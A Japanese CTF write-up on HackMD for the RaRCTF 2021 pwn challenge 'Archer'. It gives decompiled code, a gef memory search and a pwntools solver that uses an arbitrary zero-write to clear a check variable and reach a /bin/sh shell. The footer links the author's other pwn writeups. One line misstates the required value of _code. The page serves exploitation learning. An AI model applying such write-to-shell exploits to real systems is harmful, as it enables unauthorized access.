Try   HackMD
tags: RaRCTF 2021 None

Archer - RaRCTF 2021

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

writeup

main関数


























undefined8 main(void)
{
    int64_t iVar1;
    char *s1;
    
    puts("It\'s battle day archer! Have you got what it takes?");
    printf("Answer [yes/no]: ");
    fflush(_reloc.stdout);
    fgets(&s1, 5, _reloc.stdin);
    iVar1 = strstr(&s1, 0x40204e);
    if (iVar1 != 0) {
        puts("Battle isn\'t for everyone.");
        exit(0);
    }
    puts("Awesome! Make your shot.");
    makeshot();
    puts("Hope you shot well! This will decide the battle.");
    if (_code == 0x13371337) {
        exit(0);
    }
    puts("WE WON!");
    fflush(_reloc.stdout);
    system("/bin/sh");
    return 0;
}
makeshot関数













void makeshot(void)
{
    int64_t var_8h;
    
    puts("Here\'s your arrow!");
    puts("Now, which soldier do you wish to shoot?");
    fflush(_reloc.stdout);
    __isoc99_scanf(0x402109, &var_8h);
    var_8h = var_8h + 0x500000;
    *(undefined8 *)var_8h = 0;
    puts("Shot!");
    return;
}

main関数の16行目のmakeshot()の処理を見てみると、読み込んだアドレスに+0x500000していることがわかる。
(最後は、ポインタのポインタ(つまり、値)に0を代入しているだけ)

main関数内の_codeの値が0x13371337になればいいので、そのアドレスを探す。

gef➤  grep 0x13371337
[+] Searching '\x37\x13\x37\x13' in memory
[+] In '/ctf/yu1hpa/2021/rarCTF/pwn/archer/archer'(0x401000-0x402000), permission=r-x
  0x401237 - 0x401247  →   "\x37\x13\x37\x13[...]"
[+] In '/ctf/yu1hpa/2021/rarCTF/pwn/archer/archer'(0x404000-0x405000), permission=rw-
  0x404068 - 0x404078  →   "\x37\x13\x37\x13[...]"

今回は、0x404068がそのアドレスになる。

main関数の8行目、代入されたアドレスに+0x500000されることから0x404068 - 0x500000を計算したアドレスを入力として与えれば良い。

solver













#! /usr/bin/python3
from pwn import *
filename = "./archer"

io = process(filename)

TARGET_ADDR = hex(0x404068 - 0x500000)
log.info(TARGET_ADDR)

io.sendlineafter("Answer [yes/no]:", "yes")
io.sendlineafter("shoot?", TARGET_ADDR)
io.interactive()
Last changed by 
yu1hpa
272

Read more

pwn_monster1, 2, 3 - niticCTF

solverのソースコードは、GitHubにあります。 pwn_monster1 TL;DR ncしたら、nameに入力した文字が溢れそうなのでAを大量に入力する FLAG GET writeup ncした結果

Apr 26, 2022
writeups - nitic CTF

CTF後記 最終順位が48位。 Pwnにもう少し難しい問題が来るかなと予想していて、Pwnだけでまぁまぁ点数が取れるんじゃないかと思っていたが、その予想を外した。 みんなが解ける問題(pwn_monster) or 解けない問題(baby_IO_jail) に二極分化されていて悲しい。もう少し...出してほしかった。 ただ、Pwnに関しては、毎回初心者向けCTFでも5割以下の正答率だったので初参加の人にとっては「調べれば解ける」問題だったので良かった。 CryptoやWebなどの他の分野に挑戦するいい機会になった。 それと同時に、CryptoやWebもしっかり学ばないと良い順位を取ることができないことも学んだ。

Sep 6, 2021
ret2winrars - RARCTF 2021

writeup 問題名からreturn addressを書き換えると予想できる。 Let's debug!!! disass main gef➤ disass main Dump of assembler code for function main: 0x0000000000401191 <+0>: push rbp 0x0000000000401192 <+1>: mov rbp,rsp => 0x0000000000401195 <+4>: mov rax,QWORD PTR [rip+0x2eb4] # 0x404050 <stdout@@GLIBC_2.2.5>

Aug 18, 2021
printf please - redpwn CTF 2021

公式リポジトリ writeup TL;DR 配布されたCのソースファイルを見ると自明なFSBがある(30行目)。 if (!strncmp(buffer, "please", 6)) { printf(buffer); // <- here puts(" to you too!"); }

Jul 28, 2021
Read more from yu1hpa
Published on HackMD